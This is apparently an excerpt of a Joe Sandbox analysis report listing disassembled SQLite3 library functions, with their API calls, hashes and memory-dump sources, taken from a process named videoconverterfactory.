                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1159759059-0
                                                                                                      • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                                      • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                                                                      • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                                                      • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                                                                      APIs
                                                                                                      • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                                        • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                                      • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID: List of tree roots: $d$|
                                                                                                      • API String ID: 3709608969-1164703836
                                                                                                      • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                      • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                                      • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                      • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                                      APIs
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                                        • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                                      • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                                      • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                                      • String ID: e
                                                                                                      • API String ID: 786425071-4024072794
                                                                                                      • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                      • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                                      • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                                      • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_exec
                                                                                                      • String ID: sqlite_master$sqlite_temp_master$|
                                                                                                      • API String ID: 2141490097-2247242311
                                                                                                      • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                      • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                                      • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                                      • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3422960571-0
                                                                                                      • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                      • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                                                      • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                                                      • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                                                      APIs
                                                                                                        • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                                      • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                                      • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                                        • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                                        • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                                        • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                                        • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                                      • String ID:
                                                                                                      • API String ID: 683514883-0
                                                                                                      • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                      • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                                      • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                      • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                                      • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                        • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                                      • String ID:
                                                                                                      • API String ID: 1903298374-0
                                                                                                      • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                      • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                                      • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                      • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                                      APIs
                                                                                                        • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                      • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                      • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                      • String ID:
                                                                                                      • API String ID: 1894464702-0
                                                                                                      • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                      • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                                      • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                      • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                                      APIs
                                                                                                        • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                                      • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                                      • sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                      • String ID:
                                                                                                      • API String ID: 3336957480-0
                                                                                                      • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                      • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                                      • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                      • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                                      APIs
                                                                                                      • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                                      • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                                      • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                                      • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3091402450-0
                                                                                                      • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                                      • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                                      • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                                      • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 251237202-0
                                                                                                      • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                                      • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                                      • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                                      • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                                      APIs
                                                                                                      • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                                      • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                                      • String ID:
                                                                                                      • API String ID: 4225432645-0
                                                                                                      • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                                      • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                                      • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                                      • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                                      • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                                      • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                                      • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 251237202-0
                                                                                                      • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                                      • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                                                      • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                                      • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: ($string or blob too big$|
                                                                                                      • API String ID: 632333372-2398534278
                                                                                                      • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                      • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                                      • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                      • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
